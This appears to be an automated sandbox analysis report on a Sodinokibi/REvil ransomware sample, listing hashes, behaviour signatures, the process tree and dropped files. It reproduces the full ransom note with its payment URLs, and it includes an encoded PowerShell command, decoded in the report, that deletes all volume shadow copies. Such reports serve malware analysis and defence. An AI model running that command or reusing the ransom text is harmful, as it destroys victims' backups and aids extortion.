Analysis

  • max time kernel
    128s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    02-06-2024 08:44

General

  • Target

    8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe

  • Size

    166KB

  • MD5

    8d7eaf2d466b138f7d3a12d17a1e3126

  • SHA1

    f75aee8361cfff77fdd045c32769e385d3e8f5df

  • SHA256

    64f3d2db7a782fef79f46763d4ee2f83de2d656ba5813e3b3d873c17dae3ca2e

  • SHA512

    eb28b302f0a858e636aca5a37897102af085cda436f15ead69761edcaa9275d6372ce1cf1164a45bebaeb68b8022202e0290d8cd0ef1b195f518fada6d2ce18b

  • SSDEEP

    3072:EJMawtnGqtWoKeZC62aoNUSnc6udZxnXa1:+w9vteQJYUocFdZF

Malware Config

Extracted

Path

C:\Users\u82yk1-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion u82yk1.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:

1) [Recommended] Using a TOR browser!
  a) Download and install TOR browser from this site: https://torproject.org/
  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2502FDC5F027FAF1

2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
  a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
  b) Open our secondary website: http://decryptor.cc/2502FDC5F027FAF1

Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:
Key:

Extension name: u82yk1

-----------------------------------------------------------------------------------------

!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2502FDC5F027FAF1

http://decryptor.cc/2502FDC5F027FAF1

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 28 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 39 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\8d7eaf2d466b138f7d3a12d17a1e3126_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of all volume shadow copies, which is what the "Uses Volume Shadow Copy service COM API" signature reflects)
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1672
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
    PID:1728
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2844

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\TarDF2F.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\u82yk1-readme.txt

      Filesize

      6KB

      MD5

      7325477f11799a2099cce6868c5bd7e8

      SHA1

      bf2229b7cf8e1b9d02b191305ea140443581baa7

      SHA256

      47f605ae8a5af0702d3ade2f7c4413d6e4e97528e1fa8c0cd1bbc456af5760f0

      SHA512

      aa9aa38133b50bd1e8930458298d5847e3bc6c8ad3d6338ca8274a0b001b23d86f5b35dadbff1faec569ce0a257c8919fac85494600295360c9901dc4bd3cf70

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      192KB

      MD5

      9e3f247c97c241a5f4c7ea1264755992

      SHA1

      d8f8c29f3946fde8b3ce299cf0ec5faca2c0d76e

      SHA256

      936edcb68964d964049091dcc53df02d23898458875bac29339d20e04c828023

      SHA512

      111153837a9d28c1e9f592307f560414348968738567c3a8079e3ff930d3fe8453086e1cd80669fc9693c0a26cd4f2d3537719dda2652935631b0955afe3a61e

    • memory/1672-7-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

    • memory/1672-9-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

    • memory/1672-10-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

    • memory/1672-11-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

    • memory/1672-12-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

    • memory/1672-8-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

      Filesize

      9.6MB

    • memory/1672-4-0x000007FEF5DCE000-0x000007FEF5DCF000-memory.dmp

      Filesize

      4KB

    • memory/1672-6-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

      Filesize

      32KB

    • memory/1672-5-0x000000001B570000-0x000000001B852000-memory.dmp

      Filesize

      2.9MB